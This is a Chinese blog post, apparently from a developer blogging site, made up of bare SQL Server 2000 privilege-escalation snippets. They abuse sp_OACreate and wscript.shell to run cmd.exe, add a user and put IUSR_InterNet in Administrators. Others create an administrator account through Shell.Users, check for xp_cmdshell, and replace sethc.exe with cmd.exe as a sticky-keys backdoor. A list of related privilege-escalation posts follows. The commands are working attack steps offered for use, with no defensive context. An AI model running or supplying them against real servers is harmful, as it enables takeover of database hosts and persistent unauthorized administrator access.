sql 2000 提权经测试

原创 2012年03月23日 23:29:02
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod
@shell,'run',null,'c:\windows\system32\cmd.exe /c net user test test'

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod
@shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup Administrators IUSR_InterNet /add'


select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
返回1正版拓展存在



DECLARE @o int
DECLARE @z int

EXEC sp_OACreate 'Shell.Users',@o OUT
EXEC sp_OAMethod @o, 'Create', @z OUT, 'test'
EXEC sp_OASetProperty   @z, 'setting', 3 , 'AccountType'
EXEC sp_OAMethod @z, 'ChangePassword',NULL , '123456', ''


rundll32 netplwiz.dll,UsersRunDll

lusrmgr.msc


declare @o int
exec sp_oacreate 'scripting.filesystemobject', @o out 
exec sp_oamethod @o, 'copyfile',null,'c:\WINDOWS\system32\cmd.exe' ,'c:\windows\system32\sethc.exe';

小白日记21:kali渗透测试之提权(一)--本地提权

本地提权 简单地说,本地提权漏洞就是说一个本来非常低权限、受限制的用户,可以提升到系统至高无上的权限。权限提升漏洞通常是一种“辅助”性质的漏洞,当黑客已经通过某种手段进入了目标机器后,可以利用他进入更...
  • ZiXuanFY
  • ZiXuanFY
  • 2016年09月23日 15:44
  • 1346

提权系列(二)----Windows Service 服务器提权之Mssql提权,GetPass提权,hash提权,LPK提权

(一)、Mssql提权 必要条件:获取到mssql数据库最高权限用户sa的账号密码 Mssql默认端口:1433 Mssql最高权限用户:sa 得到...
  • u011781521
  • u011781521
  • 2017年03月29日 20:43
  • 1690

提权系列(一)----Windows Service 服务器提权初识与exp提权,mysql提权

一、 二、Windwos常见提权
  • u011781521
  • u011781521
  • 2017年03月29日 17:23
  • 3682

小白日记24:kali渗透测试之提权(四)--利用漏洞提权

利用漏洞提权实例 前提:已渗透进一个XP或2003系统 一、实验目标漏洞:Ms11-080 补丁:Kb2592799 漏洞信息:https://technet.microsoft.com...
  • ZiXuanFY
  • ZiXuanFY
  • 2016年10月09日 00:13
  • 2627

提权系列(一)----Windows Service 服务器提权初识与exp提权,mysql提权

转自http://m.blog.csdn.net/article/details?id=60976501 一、初识提权 很多时候我们入侵一个网站的时候,想要的是得到这个服务...
  • jaivy
  • jaivy
  • 2017年05月12日 11:14
  • 328

测试SQL Server 2000数据库连接

安装SQL Server 2000, 如果你的电脑是win7,请下载: http://pan.baidu.com/s/1o6tdjDK 如果你的电脑是XP,请下载: http://pan.ba...
  • sanqima
  • sanqima
  • 2015年09月01日 20:15
  • 579

MSSQL sa 弱口令提权基础知识学习

https://bbs.ichunqiu.com/thread-23312-1-1.html 1. “扩展存储过程”中的 xp_cmdshell Microsoft SQL...
  • wjy397
  • wjy397
  • 2017年06月29日 13:59
  • 259

实战Linux下三种不同方式的提权技巧

介绍在渗透测试或者漏洞评估的过程中,提权是非常重要的一步,在这一步,黑客和安全研究人员常常通过exploit,bug,错误配置来提升权限。本文的例子都是在虚拟机里测试的,不同的虚拟机可以从Vulnhu...
  • yaofeiNO1
  • yaofeiNO1
  • 2017年03月17日 20:04
  • 1837

Linux提权:从入门到放弃

转自:http://www.freebuf.com/articles/system/129549.html *原创作者:piece of the past,本文属Freebuf原创奖励计划,...
  • earbao
  • earbao
  • 2017年03月23日 09:25
  • 4291

驱动实现win7下cmd提权

本驱动程序是Stoned Bootkit Framework中的一部分,修改部分code实现重启桌面后对cmd和记事本进行提权; 编译环境: WDK 7600.16385.0 测试方...
  • cqyczj
  • cqyczj
  • 2014年04月20日 14:51
  • 1202
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:sql 2000 提权经测试
举报原因:
原因补充:

(最多只允许输入30个字)